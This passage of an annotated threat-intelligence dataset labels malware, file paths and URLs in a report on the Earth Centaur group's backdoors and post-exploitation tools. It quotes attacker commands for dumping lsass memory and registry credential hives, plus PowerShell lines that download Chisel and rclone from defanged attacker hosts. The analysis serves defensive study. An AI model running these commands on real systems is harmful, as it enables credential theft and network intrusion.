\"C:\\Users\\\\AppData\\Local\\Temp\/dfmanager.bin\"}\"","entities":[{"id":49882,"label":"attack-pattern","start_offset":92,"end_offset":102},{"id":49888,"label":"FILEPATH","start_offset":385,"end_offset":405},{"id":49891,"label":"URL","start_offset":566,"end_offset":618},{"id":49889,"label":"FILEPATH","start_offset":409,"end_offset":466},{"id":49883,"label":"tools","start_offset":113,"end_offset":122},{"id":49884,"label":"malware","start_offset":182,"end_offset":190},{"id":49885,"label":"threat-actor","start_offset":10,"end_offset":23},{"id":49886,"label":"FILEPATH","start_offset":228,"end_offset":285},{"id":49887,"label":"URL","start_offset":346,"end_offset":382},{"id":49881,"label":"vulnerability","start_offset":68,"end_offset":87},{"id":49890,"label":"URL","start_offset":527,"end_offset":563}],"relations":[{"id":889,"from_id":49885,"to_id":49881,"type":"exploits"},{"id":890,"from_id":49885,"to_id":49882,"type":"uses"},{"id":891,"from_id":49885,"to_id":49883,"type":"uses"},{"id":892,"from_id":49883,"to_id":49884,"type":"downloads"}],"Comments":[]} {"id":4038,"text":"After our long-term monitoring, we observed that there are two different decryption algorithms (DES or AES) used in Nerapack to decrypt the payload.","entities":[{"id":49892,"label":"malware","start_offset":116,"end_offset":124}],"relations":[],"Comments":[]} {"id":4039,"text":"Moreover, in its newer version, it uses a technique called “Timestomping.”","entities":[],"relations":[],"Comments":[]} {"id":4040,"text":"Timestomping is when the timestamp of the payload file (.bin) is altered to make it harder for incident response analysts to find it.","entities":[],"relations":[],"Comments":[]} {"id":4041,"text":" Figure 2. Timestomping used on the bin file The decryption key is used as an argument of Nerapack and various keys are used on different victims.","entities":[{"id":49893,"label":"malware","start_offset":98,"end_offset":106}],"relations":[],"Comments":[]} {"id":4042,"text":"It is a simple but effective technique that makes security analysis more difficult and also ensures that only their operators can use the tools.","entities":[],"relations":[],"Comments":[]} {"id":4043,"text":"The command for execution is shown as here: > Nerapack.exe {base64 encoded key}","entities":[{"id":49894,"label":"FILEPATH","start_offset":46,"end_offset":58}],"relations":[],"Comments":[]} {"id":4044,"text":"Fortunately, we were still able to collect the decryption key in some cases and we decrypted the payload successfully.","entities":[],"relations":[],"Comments":[]} {"id":4045,"text":"Based on our current cases, the decrypted payload is Quasar RAT.","entities":[{"id":12265,"label":"malware","start_offset":53,"end_offset":63}],"relations":[],"Comments":[]} {"id":4046,"text":"After the payload is deployed, the actors can continue further malicious actions through Quasar RAT.","entities":[{"id":49895,"label":"malware","start_offset":89,"end_offset":99}],"relations":[],"Comments":[]} {"id":4047,"text":"Stage 2: Backdoors","entities":[],"relations":[],"Comments":[]} {"id":4048,"text":"After further analysis, we found that the threat group developed multiple backdoors capable of communication via common network protocols.","entities":[],"relations":[],"Comments":[]} {"id":4049,"text":"We think this indicates that it has the capability to bypass network security systems by using these common protocols to transfer data.","entities":[{"id":49896,"label":"attack-pattern","start_offset":54,"end_offset":85}],"relations":[],"Comments":[]} {"id":4050,"text":"We also found that the group tries to launch various backdoors per victim.","entities":[{"id":49897,"label":"attack-pattern","start_offset":38,"end_offset":62}],"relations":[],"Comments":[]} {"id":4051,"text":"Furthermore, it also tends to use existing frameworks to make customized backdoors.","entities":[{"id":49898,"label":"attack-pattern","start_offset":57,"end_offset":82}],"relations":[],"Comments":[]} {"id":4052,"text":"By using existing frameworks, examples of which are detailed in the following, it builds new backdoor variants more efficiently.","entities":[],"relations":[],"Comments":[]} {"id":4053,"text":"ChiserClient","entities":[{"id":12272,"label":"malware","start_offset":0,"end_offset":12}],"relations":[],"Comments":[]} {"id":4054,"text":"After the backdoor is launched, it will decrypt the embedded C&C configuration via AES (CTR mode) algorithm for the following connection.","entities":[],"relations":[],"Comments":[]} {"id":4055,"text":"In the configuration, there are three C&C addresses and corresponding port numbers.","entities":[],"relations":[],"Comments":[]} {"id":4056,"text":" Figure 3.","entities":[],"relations":[],"Comments":[]} {"id":4057,"text":"Decrypted C&C configuration ","entities":[],"relations":[],"Comments":[]} {"id":4058,"text":"In the first connection, ChiserClient will append the host name of the compromised host for check-in purposes.","entities":[{"id":49899,"label":"malware","start_offset":25,"end_offset":37}],"relations":[],"Comments":[]} {"id":4059,"text":"Then, it will keep running on the hosts and wait for further commands from the C&C server.","entities":[],"relations":[],"Comments":[]} {"id":4060,"text":"ChiserClient is installed as a system service to allow the threat actors access to higher privileges and keep persistence on the compromised host.","entities":[{"id":49900,"label":"malware","start_offset":0,"end_offset":12}],"relations":[],"Comments":[]} {"id":4061,"text":"The capability of ChiserClient is shown in the following table: Command code Function 0x10001","entities":[{"id":12290,"label":"malware","start_offset":18,"end_offset":30}],"relations":[],"Comments":[]} {"id":4062,"text":"Write specified file 0x10002","entities":[],"relations":[],"Comments":[]} {"id":4063,"text":"Download File 0x10003","entities":[],"relations":[],"Comments":[]} {"id":4064,"text":"Read specified file 0x10004","entities":[],"relations":[],"Comments":[]} {"id":4065,"text":"No Action 0x10005","entities":[],"relations":[],"Comments":[]} {"id":4066,"text":"Open a command shell for command execution ","entities":[],"relations":[],"Comments":[]} {"id":4067,"text":"HTShell HTShell is a simple backdoor that is developed using the Mongoose framework (version 6.15).","entities":[{"id":49901,"label":"malware","start_offset":0,"end_offset":7},{"id":49902,"label":"malware","start_offset":8,"end_offset":15},{"id":49903,"label":"tools","start_offset":65,"end_offset":98}],"relations":[],"Comments":[]} {"id":4068,"text":"Mongoose is an Object Data Modeling (ODM) library for MongoDB and Node.Js.","entities":[{"id":49904,"label":"tools","start_offset":0,"end_offset":8},{"id":49905,"label":"SOFTWARE","start_offset":54,"end_offset":61},{"id":49906,"label":"SOFTWARE","start_offset":66,"end_offset":73}],"relations":[],"Comments":[]} {"id":4069,"text":"It is used to translate between objects in code and objects representation in MongoDB.","entities":[{"id":49907,"label":"SOFTWARE","start_offset":78,"end_offset":85}],"relations":[],"Comments":[]} {"id":4070,"text":"We saw in our cases that the HTShell client will be launched as a system service on the compromised machine and that it will connect to a C&C server.","entities":[{"id":49908,"label":"malware","start_offset":29,"end_offset":36}],"relations":[],"Comments":[]} {"id":4071,"text":"HTShell supports importing additional config files.","entities":[{"id":49909,"label":"malware","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} {"id":4072,"text":"We found that the additional config file is located in %PUBLIC%\\Documents\\sdcsvc.dat, and that the content should be encoded by base64.","entities":[{"id":49910,"label":"FILEPATH","start_offset":55,"end_offset":84}],"relations":[],"Comments":[]} {"id":4073,"text":"If no config file is imported, it will connect to the predefined C&C address.","entities":[],"relations":[],"Comments":[]} {"id":4074,"text":" Figure 4.","entities":[],"relations":[],"Comments":[]} {"id":4075,"text":"HTShell hardcoded C&Cs HTShell encodes a hard­-coded string, \"tp===\" with custom base64 and embeds the encoded string in the request cookies.","entities":[{"id":49911,"label":"malware","start_offset":0,"end_offset":7},{"id":49912,"label":"malware","start_offset":27,"end_offset":34}],"relations":[],"Comments":[]} {"id":4076,"text":"If the C&C server receives the request with the special cookie value, it can verify that the request comes from its client applications.","entities":[],"relations":[],"Comments":[]} {"id":4077,"text":" Figure 5.","entities":[],"relations":[],"Comments":[]} {"id":4078,"text":"HTShell hardcoded and encoded cookie string in the request header The response handler of HTShell will use “`” as delimiter to split the command code and argument for the received command.","entities":[{"id":49914,"label":"malware","start_offset":94,"end_offset":101},{"id":49913,"label":"malware","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} {"id":4079,"text":"Hence, the command will be this format: `[`] HTShell currently supports three different backdoor functions, shown here: Command code Function 0 Open a command shell for command execution 1","entities":[{"id":49915,"label":"malware","start_offset":119,"end_offset":126}],"relations":[],"Comments":[]} {"id":4080,"text":"Upload file 2 Download file","entities":[],"relations":[],"Comments":[]} {"id":4081,"text":" Customized Lilith RAT ","entities":[{"id":12317,"label":"malware","start_offset":12,"end_offset":22}],"relations":[],"Comments":[]} {"id":4082,"text":"During our investigation into Earth Centaurs activities, we found that it also uses another backdoor called Lilith RAT.","entities":[{"id":49916,"label":"threat-actor","start_offset":30,"end_offset":44},{"id":49917,"label":"malware","start_offset":108,"end_offset":118}],"relations":[{"id":893,"from_id":49916,"to_id":49917,"type":"uses"}],"Comments":[]} {"id":4083,"text":"We think that this Lilith RAT is a highly modified version of the open-source Lilith RAT.","entities":[{"id":49919,"label":"malware","start_offset":78,"end_offset":88},{"id":49918,"label":"malware","start_offset":19,"end_offset":29}],"relations":[],"Comments":[]} {"id":4084,"text":"The actors reused part of the codes for command execution, while the C&C protocol is changed to Dropbox HTTPS APIs.","entities":[],"relations":[],"Comments":[]} {"id":4085,"text":" Figure 6.","entities":[],"relations":[],"Comments":[]} {"id":4086,"text":"Reused codes from open-source Lilith RAT In order to launch this RAT, the threat actors use a technique called \"Phantom DLL hijacking.\"","entities":[{"id":49920,"label":"malware","start_offset":30,"end_offset":40},{"id":49921,"label":"attack-pattern","start_offset":116,"end_offset":137}],"relations":[],"Comments":[]} {"id":4087,"text":"In this technique, the RAT will be disguised as the normal wlbsctrl.dll.","entities":[{"id":49922,"label":"FILEPATH","start_offset":59,"end_offset":71}],"relations":[],"Comments":[]} {"id":4088,"text":"While the Windows service “IKEEXT” is starting, the fake wlbsctrl.dll is loaded and executed with high privilege.","entities":[],"relations":[],"Comments":[]} {"id":4089,"text":"Furthermore, when Lilith RAT is terminated, it will try to clean itself to prevent being found by investigators.","entities":[{"id":49923,"label":"malware","start_offset":18,"end_offset":28}],"relations":[],"Comments":[]} {"id":4090,"text":" Figure 7.","entities":[],"relations":[],"Comments":[]} {"id":4091,"text":"Self-deletion after execution ","entities":[],"relations":[],"Comments":[]} {"id":4092,"text":"For the C&C connections, the customized Lilith RAT will first check in to the attacker’s Dropbox and see if the victim host exists.","entities":[{"id":49925,"label":"SOFTWARE","start_offset":89,"end_offset":96},{"id":49924,"label":"malware","start_offset":40,"end_offset":50}],"relations":[],"Comments":[]} {"id":4093,"text":"If not, the hostname and IP address will be collected and appended to the existing compromised hosts’ information.","entities":[],"relations":[],"Comments":[]} {"id":4094,"text":"All data will then be encrypted and sent back. Figure 8.","entities":[],"relations":[],"Comments":[]} {"id":4095,"text":"The first check-in request to the Dropbox C&C After the check-in request, the backdoor will start to wait for more commands to come in.","entities":[],"relations":[],"Comments":[]} {"id":4096,"text":"All the request data are formatted to JSON, and they are encrypted by AES and encoded by base64.","entities":[],"relations":[],"Comments":[]} {"id":4097,"text":"Here is a list of the C&C commands:","entities":[],"relations":[],"Comments":[]} {"id":4098,"text":" Command Description CMDCommand Executes commands DownloadCloudFile Downloads files UploadCloudFile Uploads files GetDir Lists directories GetDirFile Lists files in a directory DeleteSelf Deletes itself SmileSvr ","entities":[],"relations":[],"Comments":[]} {"id":4099,"text":"We found that there are two types of SmileSvr.","entities":[],"relations":[],"Comments":[]} {"id":4100,"text":"The difference between the two variants is the protocol used for communication: ICMP and SSL.","entities":[],"relations":[],"Comments":[]} {"id":4101,"text":"The threat actors will use an installer to install SmileSvr as a system service and drop a DAT file that contains encoded C&C information.","entities":[],"relations":[],"Comments":[]} {"id":4102,"text":"In the configuration file, the memory size used for storing C&C address and C&C address will be defined.","entities":[],"relations":[],"Comments":[]} {"id":4103,"text":" Figure 9.","entities":[],"relations":[],"Comments":[]} {"id":4104,"text":"Encrypted configuration file ","entities":[],"relations":[],"Comments":[]} {"id":4105,"text":"The ICMP version of SmileSvr will create an ICMP socket to connect to the specified C&C address, which is defined in a configuration file.","entities":[],"relations":[],"Comments":[]} {"id":4106,"text":"In each SmileSvr, there is an embedded number (e.g., 10601 in Figure 10.) and this value will be used as sequence number in the sent ICMP packet.","entities":[],"relations":[],"Comments":[]} {"id":4107,"text":"We think attackers use this value to verify if the incoming packet belongs to their backdoor and filter out the noise.","entities":[],"relations":[],"Comments":[]} {"id":4108,"text":" Figure 10.","entities":[],"relations":[],"Comments":[]} {"id":4109,"text":"Decrypted configuration file Without knowing the real traffic from the C&C server, we can only speculate on the content of the response based on the receiving function.","entities":[],"relations":[],"Comments":[]} {"id":4110,"text":"As shown in Figure 11, the content of the response should contain the sequence number used to verify if the received data comes from the correct source and two blocks of encrypted data.","entities":[],"relations":[],"Comments":[]} {"id":4111,"text":"The data decryption procedure is as follows: First, the encrypted data is decrypted with a one-byte XOR key (0xFF).","entities":[],"relations":[],"Comments":[]} {"id":4112,"text":"The first of the decrypted content contains a magic number used to check data in the second block, a command code, and the XOR key to decrypt the second set of encrypted content.","entities":[],"relations":[],"Comments":[]} {"id":4113,"text":"The second set of encrypted content is decrypted with an XOR key (0x99) from the previous decrypted content, and within the decrypted data are instructions for the following procedures.","entities":[],"relations":[],"Comments":[]} {"id":4114,"text":" Figure 11.","entities":[],"relations":[],"Comments":[]} {"id":4115,"text":"SmileSvr packet traffic format simulation ","entities":[],"relations":[],"Comments":[]} {"id":4116,"text":"While analyzing samples, we found that the C&C server was already inactive.","entities":[],"relations":[],"Comments":[]} {"id":4117,"text":"Without knowing the traffic between SmileSvr and C&C server, we could not fully understand all functions.","entities":[],"relations":[],"Comments":[]} {"id":4118,"text":"However, most of the backdoor functions are listed here: Command code Function 0x5001","entities":[],"relations":[],"Comments":[]} {"id":4119,"text":"Opens\/Reads specified file 0x5002 Unknown 0x5004 Opens\/Writes specified file 0x5006","entities":[],"relations":[],"Comments":[]} {"id":4120,"text":"Opens command shell 0x5007 Unknown 0x5009 Closes command shell 0x500A","entities":[],"relations":[],"Comments":[]} {"id":4121,"text":"File System Traversal 0x500C","entities":[],"relations":[],"Comments":[]} {"id":4122,"text":"Checks environment information 0x500E Unknown","entities":[],"relations":[],"Comments":[]} {"id":4123,"text":"As for the SSL version of SmileSvr, the capability of SSL communication is built by using wolfSSL, which is a lightweight, C-language based SSL\/TLS library.","entities":[],"relations":[],"Comments":[]} {"id":4124,"text":"The backdoor functions of SSL version SmileSvr are similar to the ICMP ones.","entities":[],"relations":[],"Comments":[]} {"id":4125,"text":"The threat actors just use it to develop new ways to support data transfer via an encrypted channel.","entities":[],"relations":[],"Comments":[]} {"id":4126,"text":"Customized Gh0st RAT","entities":[{"id":12418,"label":"malware","start_offset":11,"end_offset":20}],"relations":[],"Comments":[]} {"id":4127,"text":"In our investigation, we also found a suspicious executable named telegram.exe.","entities":[{"id":49926,"label":"FILEPATH","start_offset":66,"end_offset":78}],"relations":[],"Comments":[]} {"id":4128,"text":"After analyzing the file, we found that it was a customized version of Gh0st RAT.","entities":[{"id":49927,"label":"malware","start_offset":71,"end_offset":80}],"relations":[],"Comments":[]} {"id":4129,"text":"Compared to the original Gh0st RAT (Gh0st beta 3.6), the difference is that the customized version supports a new function to discover information from active sessions on the host.","entities":[{"id":49928,"label":"malware","start_offset":25,"end_offset":51}],"relations":[],"Comments":[]} {"id":4130,"text":"All supported functions for the customized Gh0st are shown in the following table: Command code Function 0xC8 Terminates connection 0xCA","entities":[{"id":49929,"label":"malware","start_offset":43,"end_offset":48}],"relations":[],"Comments":[]} {"id":4131,"text":"File manager to handle file operations 0xCB Screen monitoring 0xCC Opens remote shell for command execution 0XD5 Gets active session information Post","entities":[],"relations":[],"Comments":[]} {"id":4132,"text":"Exploitation","entities":[],"relations":[],"Comments":[]} {"id":4133,"text":"After successfully exploiting the vulnerable system, the threat actor will use multiple hacking tools to discover and compromise machines on the victim’s intranet.","entities":[],"relations":[],"Comments":[]} {"id":4134,"text":"In this stage, we also observed attempts to deploy tools to exfiltrate stolen information.","entities":[],"relations":[],"Comments":[]} {"id":4135,"text":"During our investigation, we found evidence of specific tools, which we listed in Table 1.","entities":[],"relations":[],"Comments":[]} {"id":4136,"text":"With these tools, the attackers accomplish their goals (network discovery, access to the intranet, and exfiltration) step by step.","entities":[],"relations":[],"Comments":[]} {"id":4137,"text":" Tool name Purpose Description SharpHound AD Discovery Discovery tool to understand the relationship in an AD environment FRPC Intranet Penetration Fast reverse proxy to help expose a local server behind a NAT or firewall to the internet Chisel Intranet Penetration Fast TCP\/UDP tunnel RClone Exfiltration A command-line program to sync files and directories to and from different cloud storage providers Credential Dumping","entities":[{"id":49930,"label":"attack-pattern","start_offset":406,"end_offset":424},{"id":49931,"label":"tools","start_offset":31,"end_offset":41},{"id":49932,"label":"malware","start_offset":238,"end_offset":244},{"id":49933,"label":"tools","start_offset":286,"end_offset":292}],"relations":[],"Comments":[]} {"id":4138,"text":"We also observed that the group used multiple legitimate tools to dump credentials on compromised machines.","entities":[],"relations":[],"Comments":[]} {"id":4139,"text":"It made good use of these tools to achieve its goal and keep its operation hidden and unobstructive.","entities":[],"relations":[],"Comments":[]} {"id":4140,"text":"For example, the group uses ProcDump.exe (a tool from Windows Sysinternals Suite that creates dumps of the processes in any scenario), which it renamed bootsys.exe: c:\\users\\public\\downloads\\bootsys.exe -accepteula -ma lsass.exe C:\\Users\\Public\\Downloads\\lsass.dmp","entities":[{"id":49934,"label":"FILEPATH","start_offset":28,"end_offset":40},{"id":49938,"label":"FILEPATH","start_offset":220,"end_offset":229},{"id":49936,"label":"FILEPATH","start_offset":165,"end_offset":202},{"id":49937,"label":"FILEPATH","start_offset":230,"end_offset":265},{"id":49935,"label":"FILEPATH","start_offset":152,"end_offset":163}],"relations":[],"Comments":[]} {"id":4141,"text":"The group dumps credentials stored in registries by using reg.exe: reg.exe save hklm\\sam C:\\Users\\Public\\Downloads\\sam.hive reg.exe save hklm\\sam c:\\windows\\temp\\sa.dit reg.exe save hklm\\security c:\\windows\\temp\\se.dit reg.exe save hklm\\system c:\\windows\\temp\\sy.dit","entities":[{"id":49940,"label":"FILEPATH","start_offset":146,"end_offset":168},{"id":49941,"label":"FILEPATH","start_offset":169,"end_offset":176},{"id":49944,"label":"FILEPATH","start_offset":219,"end_offset":226},{"id":49947,"label":"FILEPATH","start_offset":67,"end_offset":74},{"id":49939,"label":"REGISTRYKEY","start_offset":137,"end_offset":145},{"id":49942,"label":"REGISTRYKEY","start_offset":182,"end_offset":195},{"id":49943,"label":"FILEPATH","start_offset":196,"end_offset":218},{"id":49945,"label":"REGISTRYKEY","start_offset":232,"end_offset":243},{"id":49946,"label":"FILEPATH","start_offset":244,"end_offset":266},{"id":49948,"label":"REGISTRYKEY","start_offset":80,"end_offset":88},{"id":49949,"label":"FILEPATH","start_offset":89,"end_offset":123},{"id":49950,"label":"FILEPATH","start_offset":124,"end_offset":131}],"relations":[],"Comments":[]} {"id":4142,"text":"The group would also dump memory from the specified process by using comsvcs.dll: rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump 764 C:\\Windows\\TEMP\\dump.bin full Indicator Removal To avoid exposing their footprints to investigators, the threat actors made their own tool to wipe out the event logs on the victimized machine.","entities":[{"id":49954,"label":"tools","start_offset":127,"end_offset":135},{"id":49955,"label":"FILEPATH","start_offset":140,"end_offset":164},{"id":49951,"label":"FILEPATH","start_offset":69,"end_offset":80},{"id":49952,"label":"FILEPATH","start_offset":82,"end_offset":94},{"id":49953,"label":"FILEPATH","start_offset":95,"end_offset":126}],"relations":[],"Comments":[]} {"id":4143,"text":"By using this tool, they could clean specified event logs and make it hard for investigators to track their operations.","entities":[],"relations":[],"Comments":[]} {"id":4144,"text":"The usage is as follows: Intranet Penetration","entities":[],"relations":[],"Comments":[]} {"id":4145,"text":"After successfully exploiting the vulnerable system, threat actors also drop following tools: FRP and Chisel.","entities":[{"id":49957,"label":"tools","start_offset":102,"end_offset":108},{"id":49956,"label":"tools","start_offset":94,"end_offset":97}],"relations":[],"Comments":[]} {"id":4146,"text":"FRP is a fast reverse proxy used to expose a local server behind an NAT or a firewall to the internet.","entities":[{"id":49958,"label":"tools","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":4147,"text":"It can read predefined configurations and make the host in the intranet available to users from the internet.","entities":[],"relations":[],"Comments":[]} {"id":4148,"text":" Figure 12.","entities":[],"relations":[],"Comments":[]} {"id":4149,"text":"Configuration for FRP fast reverse proxy Chisel is a fast TCP\/UDP tunnel, which is mainly used for passing through firewalls.","entities":[{"id":12469,"label":"malware","start_offset":18,"end_offset":21},{"id":12470,"label":"malware","start_offset":46,"end_offset":52}],"relations":[],"Comments":[]} {"id":4150,"text":"It provides the capability to transport data over HTTP (secured via Secure Shell, aka SSH) and allows threat actors to pass through a firewall and get access to the machine behind the firewall.","entities":[],"relations":[],"Comments":[]} {"id":4151,"text":"This is used to download reverse proxy Chisel via PowerShell: c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -command \"$(new-object System.Net.WebClient).DownloadFile('https[:]\/\/webadmin[.]mirrorstorage[.]org\/ch.exe', 'ch.exe')\"","entities":[{"id":12475,"label":"malware","start_offset":39,"end_offset":45},{"id":12476,"label":"tools","start_offset":50,"end_offset":60},{"id":49959,"label":"FILEPATH","start_offset":62,"end_offset":119},{"id":49960,"label":"URL","start_offset":179,"end_offset":226},{"id":49961,"label":"FILEPATH","start_offset":230,"end_offset":236}],"relations":[],"Comments":[]} {"id":4152,"text":"This is used to build a connection between inter\/intranet via Chisel: C:\\WINDOWS\\system32\\ch.exe client https[:]\/\/webadmin[.]mirrorstorage[.]org:443 r:127.0.0.1:47586:socks Exfiltration","entities":[{"id":49964,"label":"URL","start_offset":105,"end_offset":149},{"id":49962,"label":"tools","start_offset":62,"end_offset":68},{"id":49963,"label":"FILEPATH","start_offset":71,"end_offset":97}],"relations":[],"Comments":[]} {"id":4153,"text":"In the previous phase, we observed that the actors use several tools to get the whole picture of the network infrastructure and bypass the firewall.","entities":[],"relations":[],"Comments":[]} {"id":4154,"text":"Afterward, we observed a PowerShell command used to download an effective tool, Rclone, which is used for exfiltration.","entities":[{"id":12482,"label":"tools","start_offset":25,"end_offset":35},{"id":12484,"label":"tools","start_offset":80,"end_offset":86}],"relations":[],"Comments":[]} {"id":4155,"text":"It also provides an easy and effective way of copying data to several cloud storage providers.","entities":[],"relations":[],"Comments":[]} {"id":4156,"text":"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -command \"$(new-object System.Net.WebClient).DownloadFile('http:\/\/195[.]123[.]221[.]7:8080\/rclone.exe', 'r.exe')","entities":[{"id":49965,"label":"FILEPATH","start_offset":0,"end_offset":57},{"id":49966,"label":"URL","start_offset":117,"end_offset":159}],"relations":[],"Comments":[]} {"id":4157,"text":" Based on previous experience, Rclone has frequently been used in ransomware attacks to exfiltrate stolen data.","entities":[{"id":12490,"label":"tools","start_offset":31,"end_offset":37}],"relations":[],"Comments":[]} {"id":4158,"text":"However, it seems that currently, it is not only used in ransomware attacks but also in APT attacks.","entities":[],"relations":[],"Comments":[]} {"id":4159,"text":"Identifying Features in the Earth Centaur Campaign","entities":[{"id":49967,"label":"campaign","start_offset":28,"end_offset":50}],"relations":[],"Comments":[]} {"id":4160,"text":"After long-term observation and analysis of the attack campaigns, there was compelling evidence that they were operated by Earth Centaur.","entities":[{"id":49968,"label":"attack-pattern","start_offset":123,"end_offset":136}],"relations":[],"Comments":[]} {"id":4161,"text":"We found several identifying features of the threat actors within the techniques and tools described in the preceding sections, and we break down the factors in the following.","entities":[],"relations":[],"Comments":[]} {"id":4162,"text":"Mutex Style","entities":[],"relations":[],"Comments":[]} {"id":4163,"text":"We found some special mutexes that are encoded by the layout of the Chinese Zhuyin keyboard in ChiserClient.","entities":[{"id":49969,"label":"malware","start_offset":95,"end_offset":107}],"relations":[],"Comments":[]} {"id":4164,"text":"The decoded string is shown in Table 2.","entities":[],"relations":[],"Comments":[]} {"id":4165,"text":"Based on these special mutex strings, we believe the threat actors come from a Chinese-speaking region.","entities":[{"id":49970,"label":"threat-actor","start_offset":53,"end_offset":66},{"id":49971,"label":"location","start_offset":79,"end_offset":102}],"relations":[{"id":894,"from_id":49970,"to_id":49971,"type":"located-at"}],"Comments":[]} {"id":4166,"text":"Table 2. Encoded\/Decoded mutex string Encoded string Decoded string in Chinese English translation vul3ru,6q8 q8 y.3 小傑趴趴走 Jack goes around ji394su3 我愛你 I love you 5ji fu.6cl3g.3zj6m0694 桌球好手福原愛 Excellent table tennis player, Ai Fukuhara Configuration style ","entities":[],"relations":[],"Comments":[]} {"id":4167,"text":"After analyzing the ChiserClient, we found that it shares a similar style of network configuration to the TClient mentioned in our previous research on Earth Centaur.","entities":[{"id":12514,"label":"malware","start_offset":20,"end_offset":32},{"id":12515,"label":"malware","start_offset":106,"end_offset":113},{"id":49972,"label":"threat-actor","start_offset":152,"end_offset":166}],"relations":[{"id":895,"from_id":12515,"to_id":49972,"type":"authored-by"},{"id":896,"from_id":12514,"to_id":49972,"type":"authored-by"}],"Comments":[]} {"id":4168,"text":" Figure 13. Network configuration (Left: ChiserClient","entities":[{"id":12518,"label":"malware","start_offset":45,"end_offset":57}],"relations":[],"Comments":[]} {"id":4169,"text":"Right: TClient)","entities":[{"id":12519,"label":"malware","start_offset":7,"end_offset":14}],"relations":[],"Comments":[]} {"id":4170,"text":" Code Similarity","entities":[],"relations":[],"Comments":[]} {"id":4171,"text":"After checking the backdoor SmileSvr, we found that there was a code similarity between it and Troj_YAHAMAM, which was used by Earth Centaur in an earlier operation.","entities":[{"id":49973,"label":"malware","start_offset":95,"end_offset":107},{"id":49974,"label":"threat-actor","start_offset":127,"end_offset":140}],"relations":[{"id":897,"from_id":49974,"to_id":49973,"type":"uses"}],"Comments":[]} {"id":4172,"text":"Both share similar codes in configuration decoding, which is shown in Figure 14.","entities":[],"relations":[],"Comments":[]} {"id":4173,"text":"Furthermore, the delimiter that was used in SmileSvr to split different values in configuration files is the same as the one used in YAHAMAM (shown as Figure 15). Figure 14.","entities":[{"id":49976,"label":"malware","start_offset":44,"end_offset":52},{"id":49975,"label":"malware","start_offset":133,"end_offset":140}],"relations":[],"Comments":[]} {"id":4174,"text":"Configuration decoding function (left: SmileSvr right: Troj_Yahamam) Figure 15. Function used to split different values in configuration file (left: SmileSvr right: Troj_Yahamam)","entities":[{"id":49978,"label":"malware","start_offset":170,"end_offset":182},{"id":49979,"label":"malware","start_offset":154,"end_offset":162},{"id":49980,"label":"malware","start_offset":39,"end_offset":47},{"id":49977,"label":"malware","start_offset":55,"end_offset":67}],"relations":[],"Comments":[]} {"id":4175,"text":" Conclusion","entities":[],"relations":[],"Comments":[]} {"id":4176,"text":"These threat actors are notably sophisticated and well-equipped.","entities":[],"relations":[],"Comments":[]} {"id":4177,"text":"Looking deeper into the new methods the group uses, we found that it has an arsenal of tools capable of assessing and then compromising its targets while remaining under the radar.","entities":[],"relations":[],"Comments":[]} {"id":4178,"text":"For example, the group can map their target’s network infrastructure and bypass firewalls.","entities":[{"id":49981,"label":"attack-pattern","start_offset":73,"end_offset":89},{"id":49982,"label":"attack-pattern","start_offset":27,"end_offset":68}],"relations":[],"Comments":[]} {"id":4179,"text":"It uses backdoors with different protocols, which are deployed depending on the victim.","entities":[{"id":49983,"label":"attack-pattern","start_offset":8,"end_offset":42}],"relations":[],"Comments":[]} {"id":4180,"text":"It also has the capability to develop customized tools to evade security monitoring in different environments, and it exploits vulnerable websites and uses them as C&C servers. In this blog, we outlined our new findings related to these threat actors to help possible targets in the transportation and other industries.","entities":[],"relations":[],"Comments":[]} {"id":4181,"text":"Information on how a threat enters and operates within a victim’s network is invaluable to security teams and can help them create more effective protection for vulnerable organizations.","entities":[],"relations":[],"Comments":[]} {"id":4182,"text":"Organizations can also find capable security solutions that can help interpret and respond to malicious activities, techniques, and movements before the threat can culminate and affect an enterprise.","entities":[],"relations":[],"Comments":[]} {"id":4183,"text":"Trend Micro Vision One™️ with Managed XDR gives security teams a consolidated view into valuable insights so they can organize a more solid line of defense ahead of attacks.","entities":[{"id":49984,"label":"SOFTWARE","start_offset":0,"end_offset":24}],"relations":[],"Comments":[]} {"id":4184,"text":"For a list of the Indicators of Compromise, please see this document.","entities":[],"relations":[],"Comments":[]} {"id":4185,"text":" MITRE ATT&CK Matrix Tactics ID Technique Initial access T1190","entities":[{"id":49985,"label":"identity","start_offset":2,"end_offset":8},{"id":49986,"label":"attack-pattern","start_offset":44,"end_offset":64}],"relations":[],"Comments":[]} {"id":4186,"text":"Exploit public-facing application Execution T1059.001","entities":[{"id":49987,"label":"attack-pattern","start_offset":0,"end_offset":53}],"relations":[],"Comments":[]} {"id":4187,"text":"Command and Scripting Interpreter: PowerShell T1059.003 Command and scripting interpreter: Windows Command Shell T1569.002","entities":[{"id":49988,"label":"tools","start_offset":35,"end_offset":45},{"id":49989,"label":"tools","start_offset":91,"end_offset":112}],"relations":[],"Comments":[]} {"id":4188,"text":"System Services: Service Execution Persistence T1543.003","entities":[{"id":49990,"label":"attack-pattern","start_offset":17,"end_offset":56}],"relations":[],"Comments":[]} {"id":4189,"text":"Create or Modify System Process: Windows Service T1574.002","entities":[{"id":49991,"label":"attack-pattern","start_offset":0,"end_offset":58}],"relations":[],"Comments":[]} {"id":4190,"text":"Hijack Execution Flow: DLL Side-Loading T1505.003 Server Software Component: Web Shell Defense evasion T1140","entities":[{"id":49992,"label":"attack-pattern","start_offset":0,"end_offset":49},{"id":49993,"label":"attack-pattern","start_offset":50,"end_offset":108}],"relations":[],"Comments":[]} {"id":4191,"text":"Deobfuscate\/Decode Files or Information","entities":[{"id":49994,"label":"attack-pattern","start_offset":0,"end_offset":39}],"relations":[],"Comments":[]} {"id":4192,"text":"T1480 Execution Guardrails T1574.002","entities":[{"id":49995,"label":"attack-pattern","start_offset":6,"end_offset":36}],"relations":[],"Comments":[]} {"id":4193,"text":"Hijack Execution Flow: DLL Side-Loading T1070.001 Indicator Removal on Host: Clear Windows Event Logs T1027.002","entities":[{"id":49996,"label":"attack-pattern","start_offset":23,"end_offset":49},{"id":49997,"label":"attack-pattern","start_offset":77,"end_offset":111}],"relations":[],"Comments":[]} {"id":4194,"text":"Obfuscated Files or Information: Software Packing T1218.011","entities":[{"id":49998,"label":"attack-pattern","start_offset":0,"end_offset":59}],"relations":[],"Comments":[]} 